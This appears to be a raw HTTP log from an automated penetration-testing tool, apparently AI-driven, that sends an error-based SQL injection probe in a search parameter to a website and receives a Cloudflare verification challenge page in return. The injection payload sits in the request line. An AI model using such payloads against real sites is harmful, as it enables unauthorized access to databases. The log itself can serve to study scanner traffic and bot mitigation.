REQUEST:
GET https://my.myfirst.tech/search?options[prefix]=%27%20AND%201%3DCONVERT%28int%2C%28SELECT%20%40%40version%29%29--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9531
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8472e1c74a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=jiMx1f96mtmDYGIR%2FhapXadQcaEs40UGEfcKoDoyv6azG2w0i7%2FwvAVO%2F4rvUrqI0ThPos57MxSQtOPC3m43wJTo0vkK445kfCIk7sjDVJijvKOLLs1XCxuPSmW1t5fCSddckOGxw03%2BhTFN6Q%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8472e1c74a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'oo20JN0QsUx9PquKQ6UiiFSPN6wD4U59OFljq8QTL8U-1784281151-1.2.1.1-c2T8FPfLCxkcTyX2IZ0ZQy.GTdgMNqA.0_iqce..16u99.OGmR05b5vSxGsJvAPN',cITimeS: '1784281151',cRay: 'a1c8472e1c74a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?options%5Bprefix%5D=%27+AND+1%3DCONVERT%28int%2C%28SELECT+%40%40version%29%29--\u0026__cf_chl_tk=3MLL9_paOhMYzX3QplD_xBZetUDoF_7AaIaKouJGf6M-1784281151-1.0.1.1-D5CdhXhYNDSJ363mFc5XJ1jvcUIDHZLmmcjrU0U_POc",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?options%5Bprefix%5D=%27+AND+1%3DCONVERT%28int%2C%28SELECT+%40%40version%29%29--\u0026__cf_chl_f_tk=3MLL9_paOhMYzX3QplD_xBZetUDoF_7AaIaKouJGf6M-1784281151-1.0.1.1-D5CdhXhYNDSJ363mFc5XJ1jvcUIDHZLmmcjrU0U_POc",md: 'eakSXwjyVR2TDTjl8p0O5T8dlzML2TxgGTYqb_htoB0-1784281151-1.2.1.1-UvQvHbNnEctqzzMOvN4gl6AY_DQCCpwMluANT_TEjj3DYVPphGWHl2CHOUULDZPE6YEvj1IFNm3sD2Z2TYsmb5oB5xnJfE1arqi4nWzO3JVbzt70f2TEP71V0bOPex_w1udA63X3PliIdBc.oRBmR7B4I1pwOMZgyYNIFDvptCZzE8WnitCxyWEAwp3WdMoxbNwlvD7z7nPG3jcEjxr7gLj2vHbgVthBzAuaOgmL.FFE3wQxKx0PF5lZjFSTUX94Zar_Cu3eGqAY.iNWoLaE2ZyQy7h5RjY_emf.DWOdiSoJVUQDGWBcaVaSWE_paC1jPvafMT1gZw1KCN6iOvnSJYjbIuq1G6yH4qCDARrdD_YR53ma32JgOHJAB2xdq9EHbFScwhvhc45v5JnQ3bIEj00mveZn3dp_NFCZW.AYEdNVG.Ncg8loTk.Pk26C.ly4BDh6bh0LTlvlUYDiEh72_Gy4K.q8NWrIe8aYDK7nGrEc2BT9CcxkgJuU8TfslhKqff0CjAtwebpG_ke1.gyN9lXqhuSbOqO1NoYgQhBsgXQQuz4OLqqiXUEIQNrZGJthl5umF9V7xJovJ7JB.prSU7hbhjaVWSTA.QzP5X7SEFPo1ga0CmhxqMX0kF1XCq4J7wzgS81zHi7OoRgSbKSlgMZNP25eWdq3PDjRw_QROtuec5buA5PQORIdinG1MIccvbd8Uq_JAexNZvqnZH4TKWmlJ.3dJ2THjlxnYdQgS4CJ5Rx7.qdiN1t9EJKb1IkhlKbHi6UTZ6V2oilqArmUbdotZaknNTUVJfWiMMLHOCUptozAEvBcO9snKDvgAxSjuP8gBkSglHdmXxkWc4UwNsQSiObJ2Mh2vFX5QNMprAH.RfOnCKK0NcVzyO5nbfoU8LS.LxFXXm0TH_fdPt58_NTa2HASoTk.eA_SBiYzHNP8l7feqmkoHAx7uY35lU6uNgyeCfYBZtVGU5menuZPPQ7ottx_q2yBj7W3zZk72.CEGVzlRhFtjfEy2O2HPDzxdftxgiXicvSVL2A_MT.PDV8g3tOTvTp.YwMt2sqk3NaHvRM6HIKO3QnQDnxXRyjid7nbWrjqCbjAvtqyDZPFuZdbczFmKz0krBPRMUw.WYKgiCVRDbfWIkgQMAv9h7qIF2sT9SxDOf6gWRr0tjVzteZ1NJCKC4.WgaHijI3gHszfPy398M0w.ZjdpV3YDjIVfzH2aza48Ovd2P1wLCUPiirlG2Qhvtyd2ev1Zsl.3IE',mdrd: 'kFFl4n3V8PD6g27vcD9TKHuGnp2gNotLT5k_DXHHWFY-1784281151-1.2.1.1-Oab7X31ewdpMQeoNATwILrKPS_Rh39R.bymeiAdgO0u2ckwSi9hIxfGiqdQsETbuJWXchc6C9sGuNR_BVWv2AHma3ogoT9N3XGRIJFlsZCYQUSnhS7LW44elW2acKM7n.ohQTxp_NyWz9ZZVepvLDrAVSxyIKBkFMQ40wqoSOWFJNEw9PGG2jF_yvsDqp9cxhh29HHDe8XmxddCvlyTi1ZTJrsLPMbEpEOvCAb_PbHJC7RG9FEybmO5Tg5xUECzs',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8472e1c74a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?options%5Bprefix%5D=%27+AND+1%3DCONVERT%28int%2C%28SELECT+%40%40version%29%29--\u0026__cf_chl_rt_tk=3MLL9_paOhMYzX3QplD_xBZetUDoF_7AaIaKouJGf6M-1784281151-1.0.1.1-D5CdhXhYNDSJ363mFc5XJ1jvcUIDHZLmmcjrU0U_POc"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
